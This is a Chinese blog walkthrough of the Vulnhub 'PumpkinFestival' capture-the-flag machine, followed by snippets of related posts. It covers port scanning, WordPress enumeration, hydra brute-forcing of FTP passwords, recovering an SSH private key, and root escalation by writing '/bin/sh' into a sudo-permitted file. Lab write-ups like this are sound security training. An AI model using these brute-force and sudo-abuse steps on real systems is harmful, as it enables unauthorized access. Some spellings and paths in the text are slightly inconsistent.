Vulnhub靶机-PumpkinFestival

最新推荐文章于 2024-07-28 23:19:17 发布
最新推荐文章于 2024-07-28 23:19:17 发布
阅读量657 收藏 14
点赞数 33
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ergeLXT/article/details/140035017
版权

一、信息收集

1.主机发现

sudo arp-scan -l

2.扫描详细信息

nmap -p- -sC -sT -sV -A 192.168.127.156

二、渗透

1. ftp登录

远程登录ftp

ftp 192.168.127.156

看到有文件token.txt

下载查看

得到令牌

令牌一
2d6dbbae84d724409606eddd9dd71265

2. 查看网站

访问网站:http://192.168.127.156

有一个关键字,可能有用

Alohomera!

查看网页源代码,发现第二个令牌

令牌二

45d9ee7239bc6b0bb21d3f8e1c5faa52

扫描目录

nmap -p80 -A 192.168.127.156

访问查看

需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。

chmod 600 /etc/hosts
vim /etc/hosts

访问域名pumpkins.local

发现无法访问,解决办法:修改主机host

访问成功,发现第三个令牌

令牌三
06c3eb12ef2389e2752335beccfb2080

扫描目录时发现了tokens,访问查看

这个目录应该是有东西的,尝试访问token.txt

找到第四个令牌

令牌四
2c0e11d2200e2604587c331f02a7ebea

有一个WordPress网站在南瓜下运行,本地域名,尝试wpscan


wpscan --url http://pumpkins.local -e at -e ap -e u

得到一个名为readme.html的文件。

得到了两个用户名admin & morse为WordPress网站,访问网站

http://pumpkins.local/readme.html

K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s

得到一串代码,解密

https://gchq.github.io/CyberChef/

这是一串base62编码

解码得到密码 Ug0t!TrIpyJ

用户 morse 和 jack

登录wp-admin —— http://pumpkins.local/wp-admin

在这里发现了第五个令牌

令牌五
7139e925fd43618653e51f820bc6201b

登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字 Alohomora! ,可能是admin的密码

成功登录

得到第六个令牌

令牌六
f2e00edc353309b40e1aed18e18ab2c4

扫描pumpkins.local目录

访问查看license.txt

得到第七个令牌

令牌七
5ff346114d634a015ce413e1bc3d8d71

目前位置,共有四个管理员:admin, morse, jack, harry

但是只有三个用户的密码,使用hydra破解harry的密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.127.156 ftp -e nsr

得到密码:yrrah

ftp登录

ftp 192.168.127.156
ls
get token.txt
exit
cat token.txt

得到第八个令牌

令牌八
ba9fa9abf2be9373b7cbd9a6457f374e

ftp登录后除token.txt外还有一个目录Donotopen,查看目录

cd Donotopen
ls

有一个NO目录,继续访问,经过多次遍历,找到token.txt

得到令牌九

令牌九
f9c5053d01e0dfc30066476ab0f0564c

在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问

发现data文件

查看文件发现乱码,查看文件类型

file data.txt

发现这是一个tar压缩包

tar vxf data.txt
tar xjf data
tar vxf key
cat jack

发现是一个十六进制文件

使用xxd将hexdump转换并打补丁为二进制文件

xxd -r -p jack

得到一个ssh私钥,新建文件sshkey将私钥复制进去,

修改权限然后登录jack账户,ssh端口为6880,使用该密钥ssh登录目标主机

chmod 600 sshkey
ssh jack@192.168.127.156 -i sshkey -p 6880

kali不成功

本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录

ssh -i "key(2)" -p 6880 jack@192.168.127.156

成功登录

file token

拿到第十个令牌

./token

令牌十
8d66ef0055b43d80c34917ec6c75f706

3.提权

sudo -l

用户jack的密码是Ug0t!TrIpyJ

jack 对alohomora文件具有sudo权限,但是我们的路径上看不到pumpkins目录

新建一个pumpkins目录

mkdir pumpkins

使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。并赋予权限

echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumkins/alohomora
sudo ./alohomora

切换到root根目录下,得到最终大奖PumpkinFestival_Ticket

cd /root
ls 
cat PumpkinFestival_Ticket

Hardog123
关注
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 1014
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 653
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Vulnhub靶机
weixin_43902100的博客
09-21 675
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
VulnHub靶机入门篇--Kioptrix4
最新发布
2302_78903258的博客
07-28 1083
前面的知识点都跟之前题目差不多,后面出现了sql注入的利用,sqlmap工具的使用,以及获得webshell,在获得webshell之后的提权(数据库提权),以及一些linux的常用命令。
VulnHub靶机-SkyTower
Slow_的博客
02-26 757
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
VulnHub靶机:Hacknos-OS-Bytesec
wbplife的博客
07-12 422
靶机 IP:192.168.7.123靶机目标:普通用户Flag与root用户目录下的root.txt文件...学习目标:漏洞利用/暴力破解/权限提升。
vulnhub靶机
weixin_43902100的博客
09-28 294
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
liver100day的博客
05-15 479
渗透测试实战–BSides-Vancouver-2018-Workshop 靶机下载/安装 靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/ 靶机IP地址:未知 kali渗透机地址:192.168.75.128 1.主机发现
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 893
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 260
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 166
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1057
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1148
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 381
Vulnhub靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
Vulnhub靶机-DeRPnStiNK
ergeLXT的博客
06-28 1013
服务器上有wordpress,打开/weblog/目录,被重定向到 http://derpnstink.local/weblog。使用wpscan来枚举网站 http://derpnstink.local/weblog 的插件、主题和用户。查看发现不可以任意上传下载文件,只能在指定目录下上传下载文件,不可以使用udf。还有一个21端口,尝试登陆一下,使用stinky/wedgie57登陆成功。在ftp中找到ssh登陆的key,使用stinky用户登录成功。发现ssh不支持密码登陆,只可以通过指纹登陆。
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 961
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机:Bellatrix
qq_48904485的博客
03-03 519
一、介绍 运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:Bellatrix(10.0.2.9) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 二、信息收集 使用nmap主机发现靶机ip:10.0.2.9 使用nmap端口扫描发现靶机开放端口:22、80 nmap -A 10.0.2.9 -p 1-65535 打开网站未发现什么功能点 查看源码发现隐藏信息,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值